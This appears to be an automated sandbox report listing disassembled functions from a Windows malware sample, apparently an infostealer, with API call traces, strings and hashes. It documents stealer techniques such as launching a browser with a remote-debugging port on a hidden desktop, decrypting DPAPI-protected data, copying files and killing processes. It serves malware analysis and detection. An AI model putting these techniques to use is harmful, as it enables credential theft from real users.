lstrcpy.KERNEL32(00000000,00000000), ref: 009E743E
StrStrA.SHLWAPI(00000000,00435360), ref: 009E7451
lstrlen.KERNEL32(00000000), ref: 009E745C
malloc.MSVCRT ref: 009E7466
strncpy.MSVCRT ref: 009E7474
lstrcpy.KERNEL32(00000000,00000000), ref: 009E749F
lstrcpy.KERNEL32(00000000,00000000), ref: 009E74C6
StrStrA.SHLWAPI(00000000,00435368), ref: 009E74D9
lstrlen.KERNEL32(00000000), ref: 009E74E8
malloc.MSVCRT ref: 009E74F2
strncpy.MSVCRT ref: 009E7500
lstrcpy.KERNEL32(00000000,00000000), ref: 009E7530
lstrcpy.KERNEL32(00000000,00000000), ref: 009E7558
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009E757B
LocalAlloc.KERNEL32(00000040,00000000), ref: 009E758F
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 009E75B0
LocalFree.KERNEL32(00000000), ref: 009E75BB
lstrlen.KERNEL32(?), ref: 009E7655
lstrlen.KERNEL32(?), ref: 009E7668
lstrlen.KERNEL32(?), ref: 009E767B

Strings

hSC, xrefs: 009E7651, 009E7654, 009E76CD

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
String ID: hSC
API String ID: 2413810636-3351665975
Opcode ID: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction ID: 000dec1c19fe0f7876a2e2320d5e9d22f9bbf5c0b8a59f66f365fa5be0a60067
Opcode Fuzzy Hash: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction Fuzzy Hash: 4202BF70A04255AFCB11AFB5DC89BAEBBBAEF48304F14541AF805E7251DB78CD01DBA1

Function 009F6627 Relevance: 48.2, APIs: 32, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 009F6680
GetProcAddress.KERNEL32(006390E0,00638E44), ref: 009F6699
GetProcAddress.KERNEL32(006390E0,00638A64), ref: 009F66B1
GetProcAddress.KERNEL32(006390E0,00638A50), ref: 009F66C9
GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 009F66E2
GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 009F66FA
GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 009F6712
GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 009F672B
GetProcAddress.KERNEL32(006390E0,00638D48), ref: 009F6743
GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 009F675B
GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 009F6774
GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 009F678C
GetProcAddress.KERNEL32(006390E0,006388B0), ref: 009F67A4
GetProcAddress.KERNEL32(006390E0,00638D98), ref: 009F67BD
GetProcAddress.KERNEL32(006390E0,00638A24), ref: 009F67D5
GetProcAddress.KERNEL32(006390E0,00638C18), ref: 009F67ED
GetProcAddress.KERNEL32(006390E0,00638E34), ref: 009F6806
GetProcAddress.KERNEL32(006390E0,006388BC), ref: 009F681E
GetProcAddress.KERNEL32(006390E0,0063892C), ref: 009F6836
GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 009F684F
LoadLibraryA.KERNEL32(00638D50,?,?,?,009F1E4A), ref: 009F6860
LoadLibraryA.KERNEL32(0063897C,?,?,?,009F1E4A), ref: 009F6872
LoadLibraryA.KERNEL32(00638904,?,?,?,009F1E4A), ref: 009F6884
LoadLibraryA.KERNEL32(006389DC,?,?,?,009F1E4A), ref: 009F6895
LoadLibraryA.KERNEL32(00638B28,?,?,?,009F1E4A), ref: 009F68A7
GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 009F68C4
GetProcAddress.KERNEL32(00639020,00638C24), ref: 009F68E0
GetProcAddress.KERNEL32(00639020,006389CC), ref: 009F68F8
GetProcAddress.KERNEL32(00639114,00638B94), ref: 009F6914
GetProcAddress.KERNEL32(00638FD4,00638928), ref: 009F6930
GetProcAddress.KERNEL32(00639004,00638C14), ref: 009F694C
GetProcAddress.KERNEL32(00639004,00435864), ref: 009F6963

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction ID: d086fa0a8fcea7daacaa3a410cac115f2ae18b36096024fb65620d9322cd6f65
Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction Fuzzy Hash: E0A16DB9A117009FD758DF65EE88A6637BBFB89344300A51DF94683360DBB4A900DFB0

Function 004097A0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 235stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004097C4
lstrcatA.KERNEL32(?,?), ref: 004097D8
lstrcatA.KERNEL32(?,?), ref: 004097ED
lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00409800
memset.MSVCRT ref: 00409815

Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,00A796F0), ref: 00423E6F
Part of subcall function 00423E10: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79

wsprintfA.USER32 ref: 00409846
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409869
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409888
memset.MSVCRT ref: 004098A6
lstrcatA.KERNEL32(?,?,?,00000000,00000103), ref: 004098BB
lstrcatA.KERNEL32(?,?), ref: 004098CD
lstrcatA.KERNEL32(?,00435128), ref: 004098DD
memset.MSVCRT ref: 004098F2
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040991A
lstrcpy.KERNEL32(00000000,?), ref: 00409950
StrStrA.SHLWAPI(?,00A7E6F8), ref: 00409965
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00409982
lstrlenA.KERNEL32(?), ref: 00409996
wsprintfA.USER32 ref: 004099A6
lstrcpy.KERNEL32(?,?), ref: 004099BD
memset.MSVCRT ref: 004099D3

Strings

D, xrefs: 004099EA
%s%s, xrefs: 004099A0
--remote-debugging-port=9229 --profile-directory=", xrefs: 004097F3

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$lstrcpy$Desktopwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
API String ID: 3051782728-1862457068
Opcode ID: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
Instruction ID: d19577a6994188075af4459c382a0e83ee01d0c412b4f1100e7ad714e1588002
Opcode Fuzzy Hash: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
Instruction Fuzzy Hash: 6091B5B1214340AFD720EF64DC45F9B77E9AF88704F10892DF649972D1DBB49904CBA6

Function 009EE597 Relevance: 30.2, APIs: 20, Instructions: 213stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 009EE5BA
FindFirstFileA.KERNEL32(?,?), ref: 009EE5D0
StrCmpCA.SHLWAPI(?,00431D70), ref: 009EE5EF
StrCmpCA.SHLWAPI(?,00431D74), ref: 009EE607
wsprintfA.USER32 ref: 009EE62E
StrCmpCA.SHLWAPI(?,0042D01C), ref: 009EE643
wsprintfA.USER32 ref: 009EE65F

Part of subcall function 009EF197: lstrcpy.KERNEL32(00000000,?), ref: 009EF1C9

wsprintfA.USER32 ref: 009EE67D
PathMatchSpecA.SHLWAPI(?,?), ref: 009EE692
lstrcat.KERNEL32(?,00638D24), ref: 009EE6C7
lstrcat.KERNEL32(?,00431D64), ref: 009EE6DA
lstrcat.KERNEL32(?,?), ref: 009EE6EF
lstrcat.KERNEL32(?,00431D64), ref: 009EE702
lstrcat.KERNEL32(?,?), ref: 009EE718
CopyFileA.KERNEL32(?,?,00000001), ref: 009EE72D
lstrcpy.KERNEL32(00000000,?), ref: 009EE766
lstrcpy.KERNEL32(00000000,?), ref: 009EE7BA
DeleteFileA.KERNEL32(?), ref: 009EE7FB

Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746

FindNextFileA.KERNEL32(00000000,?), ref: 009EE840
FindClose.KERNEL32(00000000), ref: 009EE84F

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID:
API String ID: 1375681507-0
Opcode ID: 36bb2b642a6ec7b9687f7d675ca182e1ab4e96910ee8a02e493054bd41e1bc67
Instruction ID: 2e9564c5af08b0dff31744e057a808eddb8576193ecf5f9c53581df6d55a070b
Opcode Fuzzy Hash: 36bb2b642a6ec7b9687f7d675ca182e1ab4e96910ee8a02e493054bd41e1bc67
Instruction Fuzzy Hash: E0813CB15043859BD721EF74DC89FEA77A9AFC8304F00891EF54987251EB75E908CBA2

Function 009D1820 Relevance: 25.7, APIs: 17, Instructions: 219stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D1849
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D1880
lstrcpy.KERNEL32(00000000,00000000), ref: 009D18D3
lstrcat.KERNEL32(00000000), ref: 009D18DD
lstrcpy.KERNEL32(00000000,00000000), ref: 009D1909
lstrcpy.KERNEL32(00000000,?), ref: 009D1A5A
lstrcat.KERNEL32(00000000,00000000), ref: 009D1A65

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat
String ID:
API String ID: 2276651480-0
Opcode ID: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction ID: 91d0672e92830369b1ae2d8dab6558b2c2c14715a6cee46058d8e3972c834443
Opcode Fuzzy Hash: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction Fuzzy Hash: B0817371981656ABCB21EFA4CC85BAE7BB9EF95304F048027F805A7351DB78DD01DBA0

Function 009EE0B7 Relevance: 24.2, APIs: 16, Instructions: 170stringfilememoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009EE0CF
RtlAllocateHeap.NTDLL(00000000), ref: 009EE0D6
wsprintfA.USER32 ref: 009EE0EE
FindFirstFileA.KERNEL32(?,?), ref: 009EE107
StrCmpCA.SHLWAPI(?,00431D70), ref: 009EE125
StrCmpCA.SHLWAPI(?,00431D74), ref: 009EE140
wsprintfA.USER32 ref: 009EE160
DeleteFileA.KERNEL32(?), ref: 009EE1B4
CopyFileA.KERNEL32(?,?,00000001), ref: 009EE17B

Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746

Part of subcall function 009EDD07: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009EDD62
Part of subcall function 009EDD07: lstrcpy.KERNEL32(00000000,?), ref: 009EDD95
Part of subcall function 009EDD07: lstrcat.KERNEL32(?,00000000), ref: 009EDDA3
Part of subcall function 009EDD07: lstrcat.KERNEL32(?,00638B0C), ref: 009EDDBD
Part of subcall function 009EDD07: lstrcat.KERNEL32(?,?), ref: 009EDDD1
Part of subcall function 009EDD07: lstrcat.KERNEL32(?,00638DD8), ref: 009EDDE5
Part of subcall function 009EDD07: lstrcpy.KERNEL32(00000000,?), ref: 009EDE15
Part of subcall function 009EDD07: GetFileAttributesA.KERNEL32(00000000), ref: 009EDE1C

FindNextFileA.KERNEL32(00000000,?), ref: 009EE1C3
FindClose.KERNEL32(00000000), ref: 009EE1D2
lstrcat.KERNEL32(?,00638D24), ref: 009EE1F9
lstrcat.KERNEL32(?,00638A2C), ref: 009EE20B
lstrlen.KERNEL32(?), ref: 009EE216
lstrlen.KERNEL32(?), ref: 009EE225
lstrcpy.KERNEL32(00000000,?), ref: 009EE25B

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
String ID:
API String ID: 3181694991-0
Opcode ID: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
Instruction ID: 9a65d398c4f1bfd3c143b10d10e3f197cd727ecbd1c11927ccf157be047f735b
Opcode Fuzzy Hash: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
Instruction Fuzzy Hash: 98513E715083849FC724EF74DC49AEA77EAAFC8315F00892EF99987290DB74D944CB92

Function 009ED8A7 Relevance: 21.2, APIs: 14, Instructions: 183stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 009ED8C4
FindFirstFileA.KERNEL32(?,?), ref: 009ED8DB
StrCmpCA.SHLWAPI(?,00431D70), ref: 009ED8FB
StrCmpCA.SHLWAPI(?,00431D74), ref: 009ED915
lstrcat.KERNEL32(?,00638D24), ref: 009ED95A
lstrcat.KERNEL32(?,00638BF8), ref: 009ED96E
lstrcat.KERNEL32(?,?), ref: 009ED982
lstrcat.KERNEL32(?,?), ref: 009ED993
lstrcat.KERNEL32(?,00431D64), ref: 009ED9A5
lstrcat.KERNEL32(?,?), ref: 009ED9B9
lstrcpy.KERNEL32(00000000,?), ref: 009ED9F9
lstrcpy.KERNEL32(00000000,?), ref: 009EDA49
FindNextFileA.KERNEL32(00000000,?), ref: 009EDAAE
FindClose.KERNEL32(00000000), ref: 009EDABD

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
String ID:
API String ID: 50252434-0
Opcode ID: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
Instruction ID: 0d229c3678affb1e2920d42bc2742655e47f230927ab96c06de73fa23e3c941d
Opcode Fuzzy Hash: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
Instruction Fuzzy Hash: C66163B19002599BCB14EF74CC84AED7BB9EF89304F0085A9F549A7251DB74AF44CFA0

Function 004246C0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246D9
Process32First.KERNEL32(00000000,00000128), ref: 004246E9
Process32Next.KERNEL32(00000000,00000128), ref: 004246FB
StrCmpCA.SHLWAPI(?,?), ref: 0042470D
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424722
TerminateProcess.KERNEL32(00000000,00000000), ref: 00424731
CloseHandle.KERNEL32(00000000), ref: 00424738
Process32Next.KERNEL32(00000000,00000128), ref: 00424746
CloseHandle.KERNEL32(00000000), ref: 00424751

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction ID: acde96e121e2a7afcea3315a204f3f85e54aecaf4105e29a1c9688e5f6c36e20
Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction Fuzzy Hash: 6301A1316012246BE7205B60AC88FFB777DEB85B81F00109DF90596280EFB499408FB4

Function 009F4927 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009F4940
Process32First.KERNEL32(00000000,00000128), ref: 009F4950
Process32Next.KERNEL32(00000000,00000128), ref: 009F4962
StrCmpCA.SHLWAPI(?,?), ref: 009F4974
OpenProcess.KERNEL32(00000001,00000000,?), ref: 009F4989
TerminateProcess.KERNEL32(00000000,00000000), ref: 009F4998
CloseHandle.KERNEL32(00000000), ref: 009F499F
Process32Next.KERNEL32(00000000,00000128), ref: 009F49AD
CloseHandle.KERNEL32(00000000), ref: 009F49B8

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction ID: c7863537b97b9af9fbe554dac49f3c60aed6706e013fccc03705991fed528f2b
Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction Fuzzy Hash: 14018031601218ABEB215B60DC89FFB377DEB89B51F00119CFA05A6190EFB499848FB1

Function 009F4897 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 009F48AF
Process32First.KERNEL32(00000000,00000128), ref: 009F48BF
Process32Next.KERNEL32(00000000,00000128), ref: 009F48D1
StrCmpCA.SHLWAPI(?,00435644), ref: 009F48E7
Process32Next.KERNEL32(00000000,00000128), ref: 009F48F9
CloseHandle.KERNEL32(00000000), ref: 009F4904

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2284531361-0
Opcode ID: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
Instruction ID: 9f63776cc6e0e4dc61f70145c7d7303094aed638f9502d9d99465e29c402aed4
Opcode Fuzzy Hash: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
Instruction Fuzzy Hash: 72014B31601228ABD7209B74AC89FEB77BDEF08751F0401D9F908D2150EBB49AA48FE1

Function 009F7E31 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 009F8699
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009F86AE
UnhandledExceptionFilter.KERNEL32(0042C2C0), ref: 009F86B9
GetCurrentProcess.KERNEL32(C0000409), ref: 009F86D5
TerminateProcess.KERNEL32(00000000), ref: 009F86DC

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction ID: e13bad3c44b4fc73d99b21764e7a15a2feff548611fcd9dd9fcf7047ed974eac
Opcode Fuzzy Hash: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction Fuzzy Hash: D521F0B590030A9FC760DF54F984A59BBB4FB28304F50607EF51887B62EBB069858F5D

Function 00407690 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
HeapAlloc.KERNEL32(00000000), ref: 004076A5
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
LocalFree.KERNEL32(?), ref: 004076F7

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction ID: fc53f040804026e33a48c705a0d2581fa71e9ff24b93ea351c491559a1666898
Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction Fuzzy Hash: 3A011E75B40318BBEB14DBA49C4AFAA7779EB44B15F104159FB09EB2C0D6B0A9008BE4

Function 009D78F7 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 009D7905
RtlAllocateHeap.NTDLL(00000000), ref: 009D790C
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009D7934
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009D7954
LocalFree.KERNEL32(?), ref: 009D795E

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction ID: d7931f8766cca64d36228eaf74a94c2a2b9d6a35022efedcabe76ebec8797756
Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction Fuzzy Hash: F9011E75B40318BBEB14DBA49C4AFAA7779EB44B55F104159FA09EB2C0D6B0A9008BE4

Function 00424090 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

